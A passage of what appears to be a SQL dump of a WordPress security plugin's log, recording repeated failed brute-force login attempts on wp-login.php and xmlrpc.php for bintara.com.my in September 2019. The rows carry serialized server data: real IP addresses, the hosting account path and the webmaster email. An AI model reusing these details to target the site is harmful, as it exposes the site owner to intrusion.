empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"62.212.132.60\";s:11:\"REMOTE_PORT\";s:5:\"51446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyfsj42Bg6xBpmAmGziqwAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567399859.1387\";s:12:\"REQUEST_TIME\";s:10:\"1567399859\";}}','notice','2019-09-02 04:51:01','2019-09-02 04:50:59',18204640,19504112,'https://bintara.com.my/xmlrpc.php',1,0,'62.212.132.60'),(23533,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"192.169.139.6\";s:11:\"REMOTE_PORT\";s:5:\"53282\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyKETU4VuPOeWsfkg0vfwAAAQ8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567394321.4003\";s:12:\"REQUEST_TIME\";s:10:\"1567394321\";}}','notice','2019-09-02 03:18:42','2019-09-02 03:18:41',17686152,19176752,'https://bintara.com.my/wp-login.php',1,0,'192.169.139.6'),(23532,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.127.58.15\";s:11:\"REMOTE_PORT\";s:5:\"59684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyDQFvRyrCg9V6axS3FnwAAAUc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567392576.2437\";s:12:\"REQUEST_TIME\";s:10:\"1567392576\";}}','notice','2019-09-02 02:49:37','2019-09-02 02:49:36',18204864,19501328,'https://bintara.com.my/xmlrpc.php',1,0,'199.127.58.15'),(23531,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.127.58.15\";s:11:\"REMOTE_PORT\";s:5:\"58770\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyDPVvRyrCg9V6axS3FngAAAVg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567392573.3048\";s:12:\"REQUEST_TIME\";s:10:\"1567392573\";}}','notice','2019-09-02 02:49:34','2019-09-02 02:49:33',17686544,19177696,'https://bintara.com.my/wp-login.php',1,0,'199.127.58.15'),(23530,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"56260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWx-rVvRyrCg9V6axS3CfQAAAUo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567391662.0196\";s:12:\"REQUEST_TIME\";s:10:\"1567391662\";}}','notice','2019-09-02 02:34:23','2019-09-02 02:34:22',18205480,19501208,'https://bintara.com.my/xmlrpc.php',1,0,'103.90.224.155'),(23529,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"55896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWx-qzU4VuPOeWsfkg0sxgAAAQA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567391659.4147\";s:12:\"REQUEST_TIME\";s:10:\"1567391659\";}}','notice','2019-09-02 02:34:20','2019-09-02 02:34:19',17685760,19176616,'https://bintara.com.my/wp-login.php',1,0,'103.90.224.155'),(23528,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.129.131.165\";s:11:\"REMOTE_PORT\";s:5:\"41994\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWx8AzU4VuPOeWsfkg0sFgAAAQk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567390723.4206\";s:12:\"REQUEST_TIME\";s:10:\"1567390723\";}}','notice','2019-09-02 02:18:44','2019-09-02 02:18:43',18203992,19501272,'https://bintara.com.my/xmlrpc.php',1,0,'104.129.131.165'),(23527,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.129.131.165\";s:11:\"REMOTE_PORT\";s:5:\"41576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWx8AFvRyrCg9V6axS3AYAAAAVg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567390720.6431\";s:12:\"REQUEST_TIME\";s:10:\"1567390720\";}}','notice','2019-09-02 02:18:41','2019-09-02 02:18:40',17689648,19182064,'https://bintara.com.my/wp-login.php',1,0,'104.129.131.165'),(23526,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"211.171.250.169\";s:11:\"REMOTE_PORT\";s:5:\"45760\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWx0wjU4VuPOeWsfkg0qmgAAAQc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567388866.1568\";s:12:\"REQUEST_TIME\";s:10:\"1567388866\";}}','notice','2019-09-02 01:47:47','2019-09-02 01:47:46',18204368,19500776,'https://bintara.com.my/xmlrpc.php',1,0,'211.171.250.169'),(23525,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 